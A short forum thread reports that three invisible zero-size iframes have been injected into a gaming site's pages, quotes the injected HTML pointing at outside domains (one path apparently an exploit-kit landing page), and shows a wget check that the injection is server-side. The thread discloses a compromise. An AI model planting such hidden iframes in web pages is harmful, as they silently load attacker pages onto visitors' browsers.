3 IFRAMEs have been added to the source of http://www.mmowned.com:
Code:
<html><body>
<iframe src="http://www.gamerzexpress.com" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.gamerzexpress.com/elenore/index.php?" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.darkwealth.com" width="0" height="0" frameborder="0"></iframe>
</html></body>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
It's not injected via JavaScript but either generated directly by the web server or via MITM. Proof:
Code:
$ wget -qO - http://www.mmowned.com |grep gamerz >/dev/null && echo "Not injected via JavaScript."
Not injected via JavaScript.
Is there any chance that this is related to the recent alleged MMOwned hack?
Originally Posted by
Zoidberg
We already know this.
Why is the site still online then?